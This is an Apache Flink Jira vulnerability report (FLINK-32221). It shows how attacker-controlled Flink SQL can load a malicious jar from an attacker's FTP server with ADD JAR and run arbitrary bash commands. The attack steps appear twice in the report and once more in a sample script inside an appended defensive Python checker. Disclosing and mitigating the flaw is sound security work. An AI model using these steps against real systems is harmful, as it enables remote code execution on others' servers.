[
https://issues.apache.org/jira/browse/FLINK-32221?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
]
gaoyu shi updated FLINK-32221:
------------------------------
Description:
Flink SQL scripts have a similar syntax to traditional SQL, which means they also
suffer from SQL injection vulnerabilities.
An attacker can achieve Remote Code Execution when they can control part or the whole
of the Flink SQL script content, by the following steps.
1. The attacker develops an evil custom Scalar Function class and packages it into a
jar.
!image-2023-05-31-14-59-50-875.png|width=721,height=251!
2. Run an FTP server on the attacker host, and put the evil jar in it.
{code:bash}
# install the python-ftp-server tool
pip install python-ftp-server
# run the ftp server
python3 -m python_ftp_server -d . --ip <attacker-public-interface ip> -p password
# copy the evil jar to the current directory
cp <evil.jar-path> .
{code}
3. Input the Flink SQL script to trigger code execution, which assumes that the
attacker can control part or the whole of the Flink SQL script through SQL
injection or some other method.
{code:sql}
-- transfer the evil jar from the attacker host to the victim
ADD JAR 'ftp://user:password@<attacker-ip>:60000/evil.jar';
-- register the evil function in the SQL context
CREATE FUNCTION EVIL AS 'org.example.Evil';
-- run any bash command
SELECT EVIL('<bash command>');
{code}
In summary, this vulnerability allows an attacker to get remote code execution through
a Flink SQL script. After looking at several websites that use Flink, it is very
common to concatenate user input into Flink SQL statements, or even to directly allow
users to enter arbitrary Flink SQL scripts to process data.
I allow that it is not a vulnerability to execute malicious code by submitting a
malicious jar package through Flink's web interface, because developers
will hide Flink's web interface by default, such as by only listening on
localhost. However, malicious code execution through Flink SQL scripts is
completely different. Currently, there is no hardening method or default
configuration that can prevent attackers from using Flink SQL to achieve
arbitrary code execution.
Suggestion:
The 'ADD JAR' command should not be able to load remote jars, or it should at least be
disabled by default.
was:
Flink SQL scripts have a similar syntax to traditional SQL, which means they also
suffer from SQL injection vulnerabilities.
An attacker can achieve Remote Code Execution when they can control part or the whole
of the Flink SQL script content, by the following steps.
1. The attacker develops an evil custom Scalar Function class and packages it into a
jar.
!image-2023-05-31-14-59-50-875.png|width=721,height=251!
2. Run an FTP server on the attacker host, and put the evil jar in it.
{code:bash}
# install the python-ftp-server tool
pip install python-ftp-server
# run the ftp server
python3 -m python_ftp_server -d . --ip <public interface ip> -p password
# copy the evil jar to the current directory
cp <evil.jar-path> .
{code}
3. Input the Flink SQL script to trigger code execution, which assumes that the
attacker can control part or the whole of the Flink SQL script through SQL
injection or some other method.
{code:sql}
-- transfer the evil jar from the attacker host to the victim
ADD JAR 'ftp://user:password@<attacker-ip>:60000/evil.jar';
-- register the evil function in the SQL context
CREATE FUNCTION EVIL AS 'org.example.Evil';
-- run any bash command
SELECT EVIL('<bash command>');
{code}
In summary, this vulnerability allows an attacker to get remote code execution through
a Flink SQL script. After looking at several websites that use Flink, it is very
common to concatenate user input into Flink SQL statements, or even to directly allow
users to enter arbitrary Flink SQL scripts to process data.
I allow that it is not a vulnerability to execute malicious code by submitting a
malicious jar package through Flink's web interface, because developers
will hide Flink's web interface by default, such as by only listening on
localhost. However, malicious code execution through Flink SQL scripts is
completely different. Currently, there is no hardening method or default
configuration that can prevent attackers from using Flink SQL to achieve
arbitrary code execution.
Suggestion:
The 'ADD JAR' command should not be able to load remote jars, or it should at least be
disabled by default.
> Attacker can achieve Remote Code Execution when they can control Flink SQL
> script content
> ------------------------------------------------------------------------------------------
>
> Key: FLINK-32221
> URL: https://issues.apache.org/jira/browse/FLINK-32221
> Project: Flink
> Issue Type: Bug
> Environment: all versions that support SQL scripts.
> Reporter: gaoyu shi
> Priority: Major
> Attachments: image-2023-05-31-14-58-21-800.png,
> image-2023-05-31-14-59-50-875.png
>
--
This message was sent by Atlassian Jira
(v8.20.10#820010)
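Until a default like the one suggested in the report exists, a platform that accepts user-supplied Flink SQL can gate scripts before submission. The following is an added example written for this page; it is not code from the report or from Flink. It splits a script into statements (aware of string literals and of -- and /* */ comments, so a literal or comment cannot hide or fake a statement boundary), rejects any ADD JAR whose source is not a local path under an approved directory (after normalising '..'), and only permits CREATE FUNCTION classes from approved packages. It goes slightly beyond the report's two statements by also checking a USING JAR clause on CREATE FUNCTION, since a jar named there is loaded in the same way. The approved directory, the package prefix, the 203.0.113.10 address and the sample script are constructed for the example; Flink's real grammar is broader than these patterns, so unrecognised ADD statements fail closed.

```python
import posixpath
import re
from urllib.parse import urlparse

# Constructed policy for this example (assumed values, not a Flink setting):
# jars may only be loaded from these local directories, and CREATE FUNCTION
# may only name classes from these packages.
ALLOWED_JAR_DIRS = ("/opt/flink/approved-udfs/",)
ALLOWED_FUNCTION_PACKAGES = ("com.example.approved.",)

# The two statement shapes from the report, matched case-insensitively.
_ADD_JAR = re.compile(r"^\s*ADD\s+JAR\s+(['\"])(.*?)\1\s*$", re.IGNORECASE | re.DOTALL)
_CREATE_FUNCTION = re.compile(
    r"^\s*CREATE\s+(?:TEMPORARY\s+)?(?:SYSTEM\s+)?FUNCTION\s+(?:IF\s+NOT\s+EXISTS\s+)?"
    r"(\S+)\s+AS\s+(['\"])(.*?)\2",
    re.IGNORECASE | re.DOTALL,
)
# A jar named in a USING JAR clause is loaded just like one from ADD JAR.
_USING_JAR = re.compile(r"USING\s+JAR\s+(['\"])(.*?)\1", re.IGNORECASE | re.DOTALL)


def split_statements(script):
    """Split on ';' outside string literals; -- and /* */ comments are dropped."""
    stmts, buf, quote, i, n = [], [], None, 0, len(script)
    while i < n:
        ch = script[i]
        if not quote and script.startswith("--", i):     # line comment
            nl = script.find("\n", i)
            i = n if nl < 0 else nl
            continue
        if not quote and script.startswith("/*", i):     # block comment
            end = script.find("*/", i + 2)
            i = n if end < 0 else end + 2
            buf.append(" ")
            continue
        i += 1
        if quote:                                        # inside a literal
            buf.append(ch)
            quote = None if ch == quote else quote
        elif ch in ("'", '"'):
            quote = ch
            buf.append(ch)
        elif ch == ";":
            if "".join(buf).strip():
                stmts.append("".join(buf).strip())
            buf = []
        else:
            buf.append(ch)
    if "".join(buf).strip():
        stmts.append("".join(buf).strip())
    return stmts


def check_jar_source(location):
    """Return None if the jar location is acceptable, otherwise a reason."""
    parsed = urlparse(location)
    if parsed.scheme and parsed.scheme != "file":
        return f"remote jar source '{parsed.scheme}://' is not allowed"
    path = parsed.path if parsed.scheme == "file" else location
    # Normalise so '..' cannot escape the approved directory.
    norm = posixpath.normpath(path)
    if not norm.startswith(ALLOWED_JAR_DIRS):
        return f"jar path '{norm}' is outside the approved directories"
    return None


def check_function_class(class_name):
    if not class_name.startswith(ALLOWED_FUNCTION_PACKAGES):
        return f"function class '{class_name}' is not in an approved package"
    return None


def audit_script(script):
    """Return [(statement, reason), ...]; an empty list means the script passed."""
    findings = []
    for stmt in split_statements(script):
        m = _ADD_JAR.match(stmt)
        if m:
            reason = check_jar_source(m.group(2))
            if reason:
                findings.append((stmt, reason))
            continue
        m = _CREATE_FUNCTION.match(stmt)
        if m:
            reasons = [check_function_class(m.group(3))]
            reasons += [check_jar_source(jar) for _, jar in _USING_JAR.findall(stmt)]
            findings += [(stmt, r) for r in reasons if r]
            continue
        # Any other ADD statement is a form this checker does not parse:
        # fail closed rather than let it through.
        if re.match(r"^\s*ADD\s+", stmt, re.IGNORECASE):
            findings.append((stmt, "unrecognised ADD statement, failing closed"))
    return findings


# Constructed sample: the report's statements (with a documentation IP) plus
# a benign query whose string literal merely looks like an ADD JAR statement.
SAMPLE_SCRIPT = """
ADD JAR 'ftp://user:password@203.0.113.10:60000/evil.jar';
CREATE FUNCTION EVIL AS 'org.example.Evil';
SELECT EVIL('x');
SELECT count(*) FROM orders WHERE note = 'ADD JAR ''x''; -- not a statement';
"""
```

Running `audit_script(SAMPLE_SCRIPT)` yields two findings, one for the ftp:// jar source and one for the unapproved function class, while the final query with the look-alike string literal passes. The gate is a compensating control in front of the submission path, not a substitute for fixing the concatenation of user input into scripts; it should log every rejection so that attempts are visible to monitoring.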